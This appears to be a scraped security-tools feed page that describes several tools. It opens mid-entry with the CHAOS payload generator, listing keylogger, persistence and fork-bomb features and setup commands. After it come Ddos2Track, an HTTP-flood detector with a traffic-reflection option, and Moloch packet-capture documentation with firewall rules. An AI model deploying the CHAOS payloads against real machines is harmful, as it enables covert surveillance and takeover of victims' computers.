    • Upload File
    • Screenshot
    • Keylogger
    • Persistence
    • Open URL Remotely
    • Get Operating System Name
    • Run Fork Bomb

    Tested On
    Kali)Kali Linux - ROLLING EDITION

    How To Use
    # Install dependencies (You need Golang and UPX package installed)
    $ apt install golang xterm git upx-ucl -y

    # Clone this repository
    $ git clone https://github.com/tiagorlampert/CHAOS.git

    # Get and install external imports (requirement to screenshot)
    $ go get github.com/kbinani/screenshot && go get github.com/lxn/win
    $ go install github.com/kbinani/screenshot && go install github.com/lxn/win

    # Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
    # It's occurs because the libraries are to windows systems, but it necessary to build the payload.

    # Go into the repository
    $ cd CHAOS

    # Run
    $ go run CHAOS.go

    Video




    Ddos2Track - An Script To Avoid HTTP Floods Attacks

    $
    0
    0

    With this tool you can block HTTP Flood Attacks and analyze them with a honeypot.
    THE TOOL SEND YOU AN ADVERTISING EMAIL AFTER DETECT A DDOS ATTACK!
    First start the honeypot server (tools/analyze/logger.py).
    Then start the detector (tools/detector/detector.sh) in another window.
    If an attacker attack your server in preconfigured port (80), the detector will redirect all attacker requests to the honeypot during 5 seconds and next the attacker IP will be blocked.
    You can modify options and active redir2attackers, this option allows you to redirect all trafic to attacker IP, so attacker will be DoSing its own network ;)
    To view all DDoS Requests you can view the logs at '/tools/analyzer/ddos.log' To view all attackers IPs you can view it at 'tools/detector/attackers.txt'

    INSTALLING
    chmod 777 INSTALL.sh
    sh INSTALL.sh

    USING
    ./ddos2track
    Follow instructions
    Now wait for attackers :)

    Moloch - An Open Source, Large Scale, Full Packet Capturing, Indexing, And Database System

    $
    0
    0
    Moloch is an open source, large scale, full packet capturing, indexing, and database system. Moloch augments your current security infrastructure to store and index network traffic in standard PCAP format, providing fast, indexed access. An intuitive and simple web interface is provided for PCAP browsing, searching, and exporting. Moloch exposes APIs which allow for PCAP data and JSON formatted session data to be downloaded and consumed directly. Moloch stores and exports all packets in standard PCAP format allow you to also use your favorite PCAP ingesting tools, such as wireshark, during your analysis workflow.

    Access to Moloch is protected by using HTTPS with digest passwords or by using an authentication providing web server proxy. All PCAPs are stored on the sensors and are only accessed using the Moloch interface or API. Moloch is not meant to replace an IDS but instead work along side them to store and index all the network traffic in standard PCAP format, providing fast access. Moloch is built to be deployed across many systems and can scale to handle tens of gigabits/sec of traffic. PCAP retention is based on available sensor disk space. Meta data retention is based on the Elasticsearch cluster scale. Both can be increased at anytime and are under your complete control.

    Sessions Tab

    SPI View Tab

    Building
    For advanced users, if you wish to build Moloch yourself run ./easybutton-build.sh --install which will download all the prerequisites, build, and install. make config can be used to perform a initial moloch configuration. The RPM & DEB files are much easier to deal with then building yourself and are recommended.

    Components
    The Moloch system is comprised of 3 components
    1. capture - A threaded C application that monitors network traffic, writes PCAP formatted files to disk, parses the captured packets and sends meta data (SPI data) to elasticsearch.
    2. viewer - A node.js application that runs per capture machine and handles the web interface and transfer of PCAP files.
    3. elasticsearch - The search database technology powering Moloch.

    Building and Installing
    Moloch is a complex system to build and install manually. The following are rough guidelines.

    Installing Elasticsearch
    Recommended version 5.6.x for Moloch 0.18 and later. Download elasticsearch.
    Important: At this time all development is done with elasticsearch 5.6.7.
    Inside the installed$MOLOCH_PREFIX/db directory run the
    db.pl http://A_ES_HOSTNAME:9200 init script.
    Building Capture
    Use the ./easybutton-build.sh script to download all thirdparty libraries and build moloch.

    Building Viewer
    1. Install Node.js version 6.x, currently 8.x is not supported. (Moloch versions before 0.18 required 4)
    2. In the viewer directory run npm install.

    Configuration
    1. Make sure you download the latest freely available GeoIP and RIR files.
    2. Edit the config.ini file.
    3. In the viewer directory, run addUser.js to add users. Pass the --admin flag if you want admin users that can edit users from the web site. This is a good test if elasticsearch and config.ini are setup correctly:
      node addUser.js <userid> "<Friendly Name>" <password> [--admin]
    4. Edit the db/daily.sh script, and set it up in the crontab on one machine.

    Get it Running
    If you've made it this far, you are awesome!
    On each capture machine you need to run at least one moloch-capture and one moloch-viewer. Using make config will create startup files, or you can find the source files for make config in the release directory.

    Test it Out
    Point your browser to any Moloch instance at https://<hostname>:<port> and start tinkering!

    Advanced Configuration
    Hardware Requirements

    Moloch is built to run across many machines for large deployments. For demo, small network, or home installations everything on a single machine is fine.
    For larger installations please see the FAQ for recomended configurations.
    The following are rough guidelines for capturing large amounts of data with high bit rates, obviously tailor for your specific situation. It is not recommended to run the capture and elasticsearchprocesses on the same machines for highly utilized GigE networks.
    1. Moloch capture/viewer systems read FAQ Entry
    2. Moloch elasticsearch systems read FAQ Entry

    Example Configuration
    Here is an example system setup for monitoring 8x GigE highly-utilized networks, with an average of ~5 Gigabit/sec, with ~7 days of pcap storage.
    • capture/viewer machines
      • 5x HP Apollo 4200
      • 64GB of memory
      • 80TB of disk
      • Running Moloch and Suricata
    • elasticsearch machines
      • 10x HP DL380-G7
      • 128GB of memory
      • 6TB of disk
      • Each system running 1 node

    Security Information

    Ports Used
    • tcp 8005 - Moloch web interface
    • tcp 9200-920x (configurable upper limit) - Elasticsearch service ports
    • tcp 9300-930x (configurable upper limit) - Elasticsearch mesh connections

    Important Considerations
    • Elasticsearch provides NO security, so iptables MUST be used allowing only Moloch machines to talk to the elasticsearch machines (ports 9200-920x) and for them to mesh connect (ports 9300-930x). An example with 3 ES machines 2 nodes each and a viewer only machine::
      for ip in moloches1 moloches2 moloches3 molochvieweronly1; do
      iptables -A INPUT -i eth0 -p tcp --dport 9300 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9200 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9301 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9201 -s $ip -j ACCEPT
      done iptables -A INPUT -i eth0 -p tcp --dport 9300 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9200 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9301 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9201 -j DROP
    • Moloch machines should be locked down, however they need to talk to each other (port 8005), to the elasticsearch machines (ports 9200-920x), and the web interface needs to be open (port 8005).
    • Moloch viewer should be configured to use SSL.
      • It's easiest to use a single certificate with multiple DNs.
      • Make sure you protect the cert on the filesystem with proper file permissions.
    • It is possible to set up a Moloch viewer on a machine that doesn't capture any data that gateways all requests.
      • It is also possible to place apache in front of moloch, so it can handle the authentication and pass the username on to moloch
      • This is how we deploy it
    • A shared password stored in the Moloch configuration file is used to encrypt password hashes AND for inter-Moloch communication.
      • Make sure you protect the config file on the filesystem with proper file permissions.
      • Encrypted password hashes are used so a new password hash can not be inserted into elasticsearch directly in case it hasn't been secured.

    FAQ
    For answers to frequently asked questions, please see the FAQ.

    Wiki
    We use GitHub’s built-in wiki located at https://github.com/aol/moloch/wiki.

    Upgrading
    Upgrading is easy if using the RPM/DEB files.
    • Download and install the latest version, pay attention to any special instructions
    • You might need to upgrade the database with /data/moloch/db/db.pl http://localhost:9200 upgrade
    • Restart the moloch capture and viewer processes
    If upgrading from source it is a manual process.
    • Update the moloch repository from github
    • Build the moloch system using "easybutton-build.sh"
    • Shut down currently running old capture and viewer processes
    • Optionally use "make install" to copy the new binaries and other items and/or push the new items to the capture hosts
    • Run "npm update" in the viewer directory if not using "make install"
    • Make sure ES is running and update the database using the "db/db.pl host:port upgrade" script
    • Start the new capture and viewer processes

    Viewing all 5854 articles
    Browse latest View live